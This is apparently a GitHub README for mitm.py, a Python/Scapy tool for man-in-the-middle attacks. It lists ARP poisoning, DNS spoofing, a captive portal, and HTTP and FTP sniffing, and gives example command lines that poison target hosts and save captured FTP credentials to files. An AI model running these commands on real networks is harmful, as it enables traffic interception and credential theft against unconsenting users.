/mitm.py

Tool developed in Python 3 using Scapy for MITM attacks

Primary LanguagePython

mitm.py

Tool developed in Python 3 using Scapy for MITM attacks

Project Structure | Installation | Configuring | Examples

📂 Project Structure

mitm.py
├── include
|   ├── arppoison.py
|   ├── ftp_sniff.py
|   └── http_sniff.py
├── requirements.txt
└── mitm.py

Attacks

  • ARP Poisoning
  • FTP Sniffing
  • HTTP Sniffing
  • DNS Spoofing
  • Captive Portal

⚙️ Installation

To learn how to install the script, see the wiki Installation

⚙️ Configuring

To configure the hosts for DNS Spoofing attacks, you need to change the config/hosts.json, following these instructions:

{
    "kali.ada.": "192.168.1.105",
    "test.root.": "192.168.1.105"
}

Set the key name as the host, and the value as the IP to be redirected. And remember to add the '.' at the end.

📖 Examples

  • Poisoning the ARP and executing DNS Spoofing
python3 mitm.py --arp --dns --gateway 192.168.1.1 --targets 192.168.1.106/192.168.1.104

Remember to change the config/hosts.json file

  • Sniffing all http requests
python3 mitm.py --http -v

All requests will be saved at files directory

  • Sniffing all FTP credentials
python3 mitm.py --ftp -v

All credentials will be saved at files directory

  • Enable Captive Portal
python3 mitm.py --arp --dns --captive --gateway 192.168.1.1 --targets 192.168.1.106

Redirects all requests to your captive portal

</> by ReddyyZ